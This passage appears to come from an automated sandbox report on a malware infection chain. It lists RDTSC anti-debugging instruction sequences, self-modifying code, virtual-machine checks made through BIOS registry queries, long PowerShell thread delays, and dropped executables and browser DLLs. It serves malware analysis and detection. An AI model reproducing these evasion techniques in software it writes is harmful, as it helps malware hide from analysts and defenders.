                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B219C6 second address: B219CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B219CE second address: B219D2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B21F9C second address: B21FA1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2239E second address: B223A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B223A4 second address: B223AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B22695 second address: B2269A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2269A second address: B226BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A649h 0x00000009 jne 00007FD668F2A636h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B226BF second address: B226E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jnp 00007FD668F2A785h 0x0000000b jmp 00007FD668F2A779h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B24C09 second address: B24C0D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B24C0D second address: B24C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 jnl 00007FD668F2A77Dh 0x0000000d mov eax, dword ptr [esp+04h] 0x00000011 js 00007FD668F2A774h 0x00000017 jmp 00007FD668F2A76Eh 0x0000001c mov eax, dword ptr [eax] 0x0000001e push eax 0x0000001f push edx 0x00000020 jmp 00007FD668F2A770h 0x00000025 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B23D2C second address: B23D32 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B24E5E second address: B24E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B24E64 second address: B24E6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B24E6D second address: B24E71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: AF6784 second address: AF6788 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BC42 second address: B2BC4C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jo 00007FD668F2A766h 0x0000000a rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BC4C second address: B2BC5E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jnl 00007FD668F2A636h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pop eax 0x00000010 push edx 0x00000011 pop edx 0x00000012 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BF33 second address: B2BF41 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BF41 second address: B2BF45 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2BF45 second address: B2BF66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push edi 0x0000000e pop edi 0x0000000f rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2C1E1 second address: B2C1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FD668F2A63Ch 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2C1F1 second address: B2C209 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A772h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2C367 second address: B2C372 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push edx 0x00000008 pop edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2C372 second address: B2C377 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2F8A0 second address: B2F8C7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A644h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD668F2A63Bh 0x00000012 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2F9C3 second address: B2F9FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A777h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jmp 00007FD668F2A76Fh 0x00000010 mov dword ptr [esp+04h], eax 0x00000014 push ebx 0x00000015 push eax 0x00000016 push edx 0x00000017 jg 00007FD668F2A766h 0x0000001d rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2FCEC second address: B2FCFB instructions: 0x00000000 rdtsc 0x00000002 jl 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push ebx 0x0000000c pop ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B2FECF second address: B2FED3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30117 second address: B3011C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30591 second address: B30595 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30595 second address: B30599 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30599 second address: B3059F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B3059F second address: B305A9 instructions: 0x00000000 rdtsc 0x00000002 je 00007FD668F2A63Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B305A9 second address: B305DB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp], ebx 0x00000009 push 00000000h 0x0000000b push ebp 0x0000000c call 00007FD668F2A768h 0x00000011 pop ebp 0x00000012 mov dword ptr [esp+04h], ebp 0x00000016 add dword ptr [esp+04h], 00000016h 0x0000001e inc ebp 0x0000001f push ebp 0x00000020 ret 0x00000021 pop ebp 0x00000022 ret 0x00000023 sub edi, 078F224Ch 0x00000029 push eax 0x0000002a pushad 0x0000002b push edi 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B305DB second address: B305E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B305E4 second address: B305E8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30AC4 second address: B30AC8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30AC8 second address: B30AD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 je 00007FD668F2A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B30B65 second address: B30BBA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD668F2A649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c push 00000000h 0x0000000e push edx 0x0000000f call 00007FD668F2A638h 0x00000014 pop edx 0x00000015 mov dword ptr [esp+04h], edx 0x00000019 add dword ptr [esp+04h], 00000014h 0x00000021 inc edx 0x00000022 push edx 0x00000023 ret 0x00000024 pop edx 0x00000025 ret 0x00000026 mov dword ptr [ebp+122D2DEAh], edx 0x0000002c push eax 0x0000002d pushad 0x0000002e jmp 00007FD668F2A63Dh 0x00000033 push eax 0x00000034 push edx 0x00000035 push edi 0x00000036 pop edi 0x00000037 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B32B90 second address: B32B9B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnc 00007FD668F2A766h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B32B9B second address: B32BBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c pop eax 0x0000000d jmp 00007FD668F2A644h 0x00000012 popad 0x00000013 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B335F7 second address: B335FB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B341C2 second address: B341C8 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B341C8 second address: B341CE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C5F second address: B34C6C instructions: 0x00000000 rdtsc 0x00000002 je 00007FD668F2A636h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C6C second address: B34C72 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C72 second address: B34C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jmp 00007FD668F2A63Ch 0x0000000f jo 00007FD668F2A636h 0x00000015 popad 0x00000016 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C8F second address: B34C95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B34C95 second address: B34C99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B3619A second address: B361A4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FD668F2A766h 0x0000000a rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B35EEE second address: B35EF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B37D64 second address: B37D68 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B37D68 second address: B37D71 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B36A2B second address: B36A30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeRDTSC instruction interceptor: First address: B39D21 second address: B39D27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                                      Tries to evade debugger and weak emulator (self modifying code)
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSpecial instruction interceptor: First address: A1886A instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSpecial instruction interceptor: First address: BC1455 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSpecial instruction interceptor: First address: BC6B46 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Desktop\5EfYBe3nch.exeSpecial instruction interceptor: First address: C48EE6 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSpecial instruction interceptor: First address: 97FB5D instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSpecial instruction interceptor: First address: B23EF2 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSpecial instruction interceptor: First address: B233F4 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSpecial instruction interceptor: First address: B4D900 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeSpecial instruction interceptor: First address: BAF9F2 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSpecial instruction interceptor: First address: 4EEB68 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeSpecial instruction interceptor: First address: 4EEAA5 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 100EB68 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSpecial instruction interceptor: First address: 100EAA5 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSpecial instruction interceptor: First address: 7EEB68 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\Documents\GIIIIJDHJE.exeSpecial instruction interceptor: First address: 7EEAA5 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSpecial instruction interceptor: First address: 6EE7A5 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSpecial instruction interceptor: First address: 6EE68C instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSpecial instruction interceptor: First address: 8B7D2B instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\1026471001\iSHmPkn.exeSpecial instruction interceptor: First address: 9199FB instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSpecial instruction interceptor: First address: 65EB68 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeSpecial instruction interceptor: First address: 65EAA5 instructions caused by: Self-modifying code
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeMemory allocated: 2A10000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeMemory allocated: 2C10000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeMemory allocated: 2B30000 memory reserve | memory write watch
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
                                      Source: C:\Users\user\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
                                      Source: C:\Users\user\AppData\Local\Temp\31FYMQUCQX14ZVCZU2HAYNV7V.exeCode function: 5_2_04DA0B97 rdtsc 5_2_04DA0B97
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeWindow / User API: threadDelayed 3830
                                      Source: C:\Users\user\AppData\Local\Temp\1026547001\eXbhgU9.exeWindow / User API: threadDelayed 1259
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7735
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1898
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2803
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2889
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 964
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6003
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3687
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5311
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4565
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8157
                                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 639
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3640
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 971
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4065
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7291
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 856
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1474
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3016
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1143
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6514
                                      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1212
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\10DCQZI[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\am[1].exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\ProgramData\nss3.dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\1027368001\36ac23ea9d.exeJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\vcruntime140[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\mozglue[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\DLTDCR8UJINP8YM8Y.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msvcp140[1].dllJump to dropped file
                                      Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\rsn[1].exeJump to dropped file
